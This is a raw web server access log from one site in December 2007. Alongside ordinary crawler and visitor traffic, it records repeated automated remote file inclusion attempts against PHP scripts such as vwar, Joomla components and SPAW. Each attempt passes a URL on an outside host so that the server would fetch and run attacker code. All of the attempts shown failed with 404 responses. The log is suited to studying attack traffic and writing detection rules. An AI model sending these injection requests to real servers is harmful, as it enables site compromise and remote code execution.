68.142.212.185 - - [23/Dec/2007:22:32:23 -0800] "GET /retreat1/webcam/retreat1_00937.jpg HTTP/1.0" 200 16277 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [23/Dec/2007:22:32:43 -0800] "GET /retreat1/webcam/retreat1_00664.jpg HTTP/1.0" 200 17080 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [23/Dec/2007:22:33:04 -0800] "GET /retreat1/webcam/retreat1_00712.jpg HTTP/1.0" 200 17029 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [23/Dec/2007:22:33:24 -0800] "GET /retreat1/webcam/retreat1_00127.jpg HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [23/Dec/2007:22:34:25 -0800] "GET /retreat1/webcam/retreat1_00484.jpg HTTP/1.0" 200 40792 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [23/Dec/2007:22:35:06 -0800] "GET /retreat1/webcam/retreat1_00487.jpg HTTP/1.0" 200 25095 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
116.68.194.36 - - [23/Dec/2007:22:35:59 -0800] "GET /menu.php?mosConfig_absolute_path=http://116.68.194.36/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
116.68.194.36 - - [23/Dec/2007:22:36:00 -0800] "GET /logs/menu.php?mosConfig_absolute_path=http://116.68.194.36/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
68.142.212.185 - - [23/Dec/2007:22:36:12 -0800] "GET /retreat1/webcam/retreat1_00224.jpg HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [23/Dec/2007:22:36:49 -0800] "GET /retreat1/webcam/retreat1_00888.jpg HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
74.6.19.169 - - [23/Dec/2007:22:38:55 -0800] "GET /funny/?M=A HTTP/1.0" 200 792 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
68.142.212.185 - - [23/Dec/2007:22:39:15 -0800] "GET /retreat1/webcam/retreat1_00065.jpg HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [23/Dec/2007:22:40:03 -0800] "GET /retreat1/webcam/retreat1_00305.jpg HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
74.6.27.20 - - [23/Dec/2007:22:45:40 -0800] "GET /tmp/?D=D HTTP/1.0" 200 1660 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
89.149.208.203 - - [23/Dec/2007:22:48:59 -0800] "GET /logs/access_071127.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.mywebwizard.com/members/2oursite/shoppingcart/catalog/images/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.149.208.203 - - [23/Dec/2007:22:49:00 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.mywebwizard.com/members/2oursite/shoppingcart/catalog/images/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.149.208.203 - - [23/Dec/2007:22:49:00 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.mywebwizard.com/members/2oursite/shoppingcart/catalog/images/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.235.14.61 - - [23/Dec/2007:22:49:21 -0800] "GET /funny/ HTTP/1.1" 200 812 "http://search.yahoo.com/search?p=index+of+fynny+&fr=yfp-t-322&toggle=1&cop=mss&ei=UTF-8" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.dmulk.com"
84.235.14.61 - - [23/Dec/2007:22:49:27 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.dmulk.com"
89.149.208.203 - - [23/Dec/2007:22:50:03 -0800] "GET /logs/access_071215.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.mywebwizard.com/members/2oursite/shoppingcart/catalog/images/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.235.14.61 - - [23/Dec/2007:22:50:09 -0800] "GET /funny/Mencanmultitask.asx HTTP/1.1" 200 196608 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.dmulk.com"
116.68.194.36 - - [23/Dec/2007:22:50:21 -0800] "GET /home.php?old_reports.php?file=http://116.68.194.36/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
116.68.194.36 - - [23/Dec/2007:22:50:21 -0800] "GET /logs/home.php?old_reports.php?file=http://116.68.194.36/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
84.235.14.61 - - [23/Dec/2007:22:50:25 -0800] "GET /funny/Mencanmultitask.asx HTTP/1.1" 200 262144 "http://www.dmulk.com/funny/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.dmulk.com"
84.244.151.79 - - [23/Dec/2007:22:50:58 -0800] "GET /logs/access_071216.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.244.151.79 - - [23/Dec/2007:22:50:58 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.244.151.79 - - [23/Dec/2007:22:50:59 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
122.201.80.100 - - [23/Dec/2007:22:50:59 -0800] "GET /logs/access_071127.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.mywebwizard.com/members/2oursite/shoppingcart/catalog/images/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
122.201.80.100 - - [23/Dec/2007:22:50:59 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.mywebwizard.com/members/2oursite/shoppingcart/catalog/images/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
122.201.80.100 - - [23/Dec/2007:22:51:00 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.mywebwizard.com/members/2oursite/shoppingcart/catalog/images/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.241.168.186 - - [23/Dec/2007:22:51:35 -0800] "GET /logs/access_071127.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://claroline.lct-net.cl/id??? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.241.168.186 - - [23/Dec/2007:22:51:35 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://claroline.lct-net.cl/id??? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.241.168.186 - - [23/Dec/2007:22:51:35 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://claroline.lct-net.cl/id??? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
84.235.14.61 - - [23/Dec/2007:22:51:37 -0800] "GET /funny/Mencanmultitask.asx HTTP/1.1" 200 262144 "-" "Windows-Media-Player/10.00.00.4036" "www.dmulk.com"
59.148.232.33 - - [23/Dec/2007:22:51:38 -0800] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
59.148.232.33 - - [23/Dec/2007:22:51:38 -0800] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.244.151.79 - - [23/Dec/2007:22:51:46 -0800] "GET /logs/access_071127.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.235.14.61 - - [23/Dec/2007:22:52:03 -0800] "GET /funny/Mencanmultitask.asx HTTP/1.1" 206 777680 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.dmulk.com"
122.201.80.100 - - [23/Dec/2007:22:52:19 -0800] "GET /logs/access_071215.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.mywebwizard.com/members/2oursite/shoppingcart/catalog/images/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.241.168.186 - - [23/Dec/2007:22:53:27 -0800] "GET /logs/access_071215.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://claroline.lct-net.cl/id??? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.194.71.230 - - [23/Dec/2007:22:54:55 -0800] "GET /index.php?page=http://116.68.194.36/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
82.194.71.230 - - [23/Dec/2007:22:54:55 -0800] "GET /logs/index.php?page=http://116.68.194.36/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
206.170.49.64 - - [23/Dec/2007:22:55:02 -0800] "GET /presto/ HTTP/1.1" 200 526 "http://home.earthlink.net/~infernofilecabinet2/XpSetupsF_J/JourneyPII_Setup.htm" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.13) Gecko/20060414" "www.dmulk.com"
206.170.49.64 - - [23/Dec/2007:22:55:34 -0800] "GET / HTTP/1.1" 200 2962 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.13) Gecko/20060414" "www.dmulk.com"
206.170.49.64 - - [23/Dec/2007:22:55:39 -0800] "GET /presto/ HTTP/1.1" 200 526 "http://www.dmulk.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.13) Gecko/20060414" "www.dmulk.com"
82.194.71.230 - - [23/Dec/2007:22:56:18 -0800] "GET //protection.php?action=logout&siteurl=http://116.68.194.36/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
82.194.71.230 - - [23/Dec/2007:22:56:19 -0800] "GET /logs//protection.php?action=logout&siteurl=http://116.68.194.36/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
89.149.208.203 - - [23/Dec/2007:22:59:11 -0800] "GET /logs/access_071215.log/convert/mvcw.php?vwar_root=http://www.mywebwizard.com/members/2oursite/shoppingcart/catalog/images/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.149.208.203 - - [23/Dec/2007:22:59:11 -0800] "GET /convert/mvcw.php?vwar_root=http://www.mywebwizard.com/members/2oursite/shoppingcart/catalog/images/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.149.208.203 - - [23/Dec/2007:22:59:12 -0800] "GET /logs/convert/mvcw.php?vwar_root=http://www.mywebwizard.com/members/2oursite/shoppingcart/catalog/images/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.149.208.203 - - [23/Dec/2007:22:59:24 -0800] "GET /logs/access_071129.log/convert/mvcw.php?vwar_root=http://www.mywebwizard.com/members/2oursite/shoppingcart/catalog/images/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.244.151.79 - - [23/Dec/2007:23:02:16 -0800] "GET /logs/access_071129.log/convert/mvcw.php?vwar_root=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.244.151.79 - - [23/Dec/2007:23:02:16 -0800] "GET /convert/mvcw.php?vwar_root=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.244.151.79 - - [23/Dec/2007:23:02:16 -0800] "GET /logs/convert/mvcw.php?vwar_root=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.241.168.186 - - [23/Dec/2007:23:02:19 -0800] "GET /logs/access_071129.log/convert/mvcw.php?vwar_root=http://claroline.lct-net.cl/id??? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.241.168.186 - - [23/Dec/2007:23:02:20 -0800] "GET /convert/mvcw.php?vwar_root=http://claroline.lct-net.cl/id??? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.241.168.186 - - [23/Dec/2007:23:02:20 -0800] "GET /logs/convert/mvcw.php?vwar_root=http://claroline.lct-net.cl/id??? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
122.201.80.100 - - [23/Dec/2007:23:02:39 -0800] "GET /logs/access_071215.log/convert/mvcw.php?vwar_root=http://www.mywebwizard.com/members/2oursite/shoppingcart/catalog/images/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
122.201.80.100 - - [23/Dec/2007:23:02:40 -0800] "GET /convert/mvcw.php?vwar_root=http://www.mywebwizard.com/members/2oursite/shoppingcart/catalog/images/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
122.201.80.100 - - [23/Dec/2007:23:02:40 -0800] "GET /logs/convert/mvcw.php?vwar_root=http://www.mywebwizard.com/members/2oursite/shoppingcart/catalog/images/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
122.201.80.100 - - [23/Dec/2007:23:03:00 -0800] "GET /logs/access_071129.log/convert/mvcw.php?vwar_root=http://www.mywebwizard.com/members/2oursite/shoppingcart/catalog/images/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.244.151.79 - - [23/Dec/2007:23:03:35 -0800] "GET /logs/access_071215.log/convert/mvcw.php?vwar_root=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.241.168.186 - - [23/Dec/2007:23:03:53 -0800] "GET /logs/access_071215.log/convert/mvcw.php?vwar_root=http://claroline.lct-net.cl/id??? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.194.71.230 - - [23/Dec/2007:23:05:09 -0800] "GET //library/lib.php?root=http://116.68.194.36/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
82.194.71.230 - - [23/Dec/2007:23:05:11 -0800] "GET /logs//library/lib.php?root=http://116.68.194.36/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
207.67.55.94 - - [23/Dec/2007:23:10:47 -0800] "GET /displayCategory.php?basepath=http://www.myrentaldesk.com/securemembership/data/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
84.235.14.61 - - [23/Dec/2007:23:11:36 -0800] "GET /funny/ HTTP/1.1" 200 812 "http://search.yahoo.com/search;_ylt=A0geu5f3WW9HoFUAUANXNyoA?p=index+of+funny+Parent+Directory+&y=Search&fr=&ei=UTF-8" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.dmulk.com"
84.235.14.61 - - [23/Dec/2007:23:11:38 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.dmulk.com"
89.107.65.47 - - [23/Dec/2007:23:11:50 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.azone168.com.tw/ananas//components/com_simpleboard/ranks/errors.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.235.14.61 - - [23/Dec/2007:23:11:59 -0800] "GET /funny/?M=A HTTP/1.1" 200 812 "http://search.yahoo.com/search;_ylt=A0geu5f3WW9HoFUAUANXNyoA?p=index+of+funny+Parent+Directory+&y=Search&fr=&ei=UTF-8" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.dmulk.com"
84.235.14.61 - - [23/Dec/2007:23:12:00 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.dmulk.com"
89.107.65.47 - - [23/Dec/2007:23:12:44 -0800] "GET /convert/mvcw.php?vwar_root=http://www.azone168.com.tw/ananas//components/com_simpleboard/ranks/errors.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.30.179.208 - - [23/Dec/2007:23:13:00 -0800] "GET /funny/?D=A HTTP/1.0" 200 792 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
207.67.55.94 - - [23/Dec/2007:23:16:32 -0800] "GET /admin.php?include_path=http://www.myrentaldesk.com/securemembership/data/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.107.65.47 - - [23/Dec/2007:23:18:55 -0800] "GET /logs/access_071127.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.azone168.com.tw/ananas//components/com_simpleboard/ranks/errors.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.107.65.47 - - [23/Dec/2007:23:18:55 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.azone168.com.tw/ananas//components/com_simpleboard/ranks/errors.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
68.142.212.185 - - [23/Dec/2007:23:18:56 -0800] "GET /retreat1/webcam/retreat1_00672.jpg HTTP/1.0" 200 16982 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [23/Dec/2007:23:19:39 -0800] "GET /retreat1/webcam/retreat1_00994.jpg HTTP/1.0" 200 16023 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
89.107.65.47 - - [23/Dec/2007:23:19:42 -0800] "GET /logs/access_071215.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.azone168.com.tw/ananas//components/com_simpleboard/ranks/errors.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
68.142.212.185 - - [23/Dec/2007:23:19:57 -0800] "GET /retreat1/webcam/retreat1_00495.jpg HTTP/1.0" 200 17287 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [23/Dec/2007:23:20:39 -0800] "GET /retreat1/webcam/retreat1_00393.jpg HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
61.152.158.46 - - [23/Dec/2007:23:20:50 -0800] "GET /logs/home.php?akocomments.php?mosConfig_absolute_path=%20http://116.68.194.36/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
68.142.212.185 - - [23/Dec/2007:23:21:45 -0800] "GET /retreat1/webcam/retreat1_00899.jpg HTTP/1.0" 200 21035 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [23/Dec/2007:23:22:06 -0800] "GET /retreat1/webcam/retreat1_00681.jpg HTTP/1.0" 200 16963 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [23/Dec/2007:23:22:49 -0800] "GET /retreat1/webcam/retreat1_00457.jpg HTTP/1.0" 200 48500 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
74.6.28.162 - - [23/Dec/2007:23:23:36 -0800] "GET /megumi/earrings/?S=A HTTP/1.0" 200 2065 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
68.142.212.185 - - [23/Dec/2007:23:23:53 -0800] "GET /retreat1/webcam/retreat1_00103.jpg HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [23/Dec/2007:23:24:11 -0800] "GET /retreat1/webcam/retreat1_00995.jpg HTTP/1.0" 200 16050 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [23/Dec/2007:23:24:53 -0800] "GET /retreat1/webcam/retreat1_00022.jpg HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [23/Dec/2007:23:25:33 -0800] "GET /retreat1/webcam/retreat1_00272.jpg HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [23/Dec/2007:23:26:35 -0800] "GET /retreat1/webcam/retreat1_00504.jpg HTTP/1.0" 200 17362 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [23/Dec/2007:23:27:18 -0800] "GET /retreat1/webcam/retreat1_00333.jpg HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
194.109.22.106 - - [23/Dec/2007:23:27:46 -0800] "GET //admin/admin.php?vwar_root=http://armageddon0683.zoomshare.com/files/file_injek/test_0.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
194.109.22.106 - - [23/Dec/2007:23:27:56 -0800] "GET /logs//admin/admin.php?vwar_root=http://armageddon0683.zoomshare.com/files/file_injek/test_0.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
68.142.212.185 - - [23/Dec/2007:23:28:00 -0800] "GET /retreat1/webcam/retreat1_00721.jpg HTTP/1.0" 200 28481 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
207.67.55.94 - - [23/Dec/2007:23:28:31 -0800] "GET /logs/access_071215.log/admin.php?include_path=http://www.myrentaldesk.com/securemembership/data/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.67.55.94 - - [23/Dec/2007:23:28:32 -0800] "GET /logs/admin.php?include_path=http://www.myrentaldesk.com/securemembership/data/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
68.142.212.185 - - [23/Dec/2007:23:28:41 -0800] "GET /retreat1/webcam/retreat1_00632.jpg HTTP/1.0" 200 26374 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [23/Dec/2007:23:29:01 -0800] "GET /retreat1/webcam/retreat1_00265.jpg HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [23/Dec/2007:23:29:45 -0800] "GET /retreat1/webcam/retreat1_00166.jpg HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
202.180.216.12 - - [23/Dec/2007:23:29:48 -0800] "GET /administrator/components/com_color/admin.color.php?mosConfig_live_site=http://wooshck.org/rotation/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.67.55.94 - - [23/Dec/2007:23:30:45 -0800] "GET /logs/access_071216.log/displayCategory.php?basepath=http://www.myrentaldesk.com/securemembership/data/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.67.55.94 - - [23/Dec/2007:23:30:45 -0800] "GET /logs/displayCategory.php?basepath=http://www.myrentaldesk.com/securemembership/data/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
68.142.212.185 - - [23/Dec/2007:23:30:47 -0800] "GET /retreat1/webcam/retreat1_00163.jpg HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [23/Dec/2007:23:31:08 -0800] "GET /retreat1/webcam/retreat1_00638.jpg HTTP/1.0" 200 17542 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [23/Dec/2007:23:32:08 -0800] "GET /retreat1/webcam/retreat1_00282.jpg HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [23/Dec/2007:23:32:59 -0800] "GET /retreat1/webcam/retreat1_00170.jpg HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [23/Dec/2007:23:33:13 -0800] "GET /retreat1/webcam/retreat1_00814.jpg HTTP/1.0" 200 15296 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
89.107.65.47 - - [23/Dec/2007:23:33:53 -0800] "GET /logs/access_071215.log/convert/mvcw.php?vwar_root=http://www.azone168.com.tw/ananas//components/com_simpleboard/ranks/errors.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.107.65.47 - - [23/Dec/2007:23:33:54 -0800] "GET /logs/convert/mvcw.php?vwar_root=http://www.azone168.com.tw/ananas//components/com_simpleboard/ranks/errors.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.107.65.47 - - [23/Dec/2007:23:34:04 -0800] "GET /logs/access_071129.log/convert/mvcw.php?vwar_root=http://www.azone168.com.tw/ananas//components/com_simpleboard/ranks/errors.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.22.126 - - [23/Dec/2007:23:36:04 -0800] "GET /tmp/sess_f6e3039f64398e069bcbb327236aa12b HTTP/1.0" 403 163 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
